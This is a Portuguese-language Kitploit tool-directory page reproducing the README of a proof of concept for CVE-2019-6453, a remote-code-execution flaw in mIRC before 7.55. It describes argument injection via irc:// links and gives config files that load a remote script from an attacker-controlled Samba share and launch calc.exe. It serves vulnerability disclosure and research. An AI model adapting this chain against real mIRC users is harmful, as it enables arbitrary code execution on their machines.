Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2019-6453-poc — Prova de cálculo para CVE-2019-6453 | Kitploit
Ferramentas/GitHubGitHub/proofofcalc/cve-2019-6453-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubproofofcalc/cve-2019-6453-poc

cve-2019-6453-poc

Prova de cálculo para CVE-2019-6453

Ver Repositório
481254há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-6453: RCE no mIRC <7.55 usando injeção de argumentos através de manipuladores de protocolo URI personalizados

Encontramos uma vulnerabilidade de Execução Remota de Código no mIRC através do manipulador de protocolo URI irc://. Como o mIRC não usa nenhum tipo de símbolo como -- para marcar o fim da lista de argumentos, um atacante consegue passar argumentos para o mIRC através de um link irc:// e executar código arbitrário ao carregar um mirc.ini personalizado de um servidor de arquivos Samba controlado pelo atacante. Observe que ircs:// funciona da mesma maneira.

PoC

A prova de conceito do calc requer três arquivos: mirc.ini, calc.ini e poc.html. Assumimos que um servidor de arquivos Samba está em execução no lado do atacante. Para fins de exemplo, os seguintes trechos de código assumem que ele está em execução no host 127.0.0.1 (ou seja, substitua 127.0.0.1 pelo endereço do seu próprio servidor nos seguintes arquivos para testar isso).

mirc.ini

mirc.ini é um arquivo de configuração personalizado que deve estar localizado em C:\mirc-poc\mirc.ini no servidor de arquivos.

root@kitploit:~
[rfiles]
n2=\\127.0.0.1\C$\mirc-poc\calc.ini

calc.ini

Baixar ferramenta

calc.ini é um arquivo de script remoto que deve estar localizado em C:\mirc-poc\calc.ini no servidor de arquivos.

root@kitploit:~
[script]
n0=on *:START: {
n1=  /run calc.exe
n2=}

poc.html

Apenas visitar poc.html deve funcionar, assumindo que o mIRC esteja definido como o manipulador padrão para o esquema de URI irc:// e que o navegador não codifique o payload. Dependendo do navegador e da sua configuração, você ainda pode receber uma solicitação (não é o caso no Firefox).

root@kitploit:~

GIF da PoC

GIF da PoC

Versões afetadas

Esta PoC funciona para mIRC <7.55.

Você pode acionar a PoC no Edge 42.17134 (última versão de pré-visualização) e no Firefox 64.0.2 (última versão final). Não funciona no Chrome por causa da forma como o Chrome lida com protocolos de URI (a URI é codificada antes de ser passada ao aplicativo).

Autores

  • Baptiste Devigne (Geluchat) e Benjamin Chetioui (SIben)